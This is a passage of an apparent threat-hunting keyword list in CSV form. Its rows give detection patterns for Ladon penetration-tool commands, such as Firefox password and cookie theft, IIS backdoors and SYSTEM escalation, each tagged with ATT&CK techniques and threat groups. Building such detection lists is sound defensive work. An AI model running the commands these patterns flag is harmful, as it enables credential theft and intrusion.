loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z
-*Ladon EnableDotNet*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z
-*Ladon EnumProcess*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z
-*Ladon EnumShare*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z
-*Ladon Exploit*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z
-*Ladon FindIP *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon FirefoxCookie*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon FirefoxHistory*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon FirefoxPwd*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon ForExec *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon FtpDownLoad *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon FtpServer *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon GetDomainIP*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon gethtml *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon GetPipe*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon GetSystem*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon IISdoor*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon IISpwd*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon MssqlCmd *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon netsh *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon noping *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
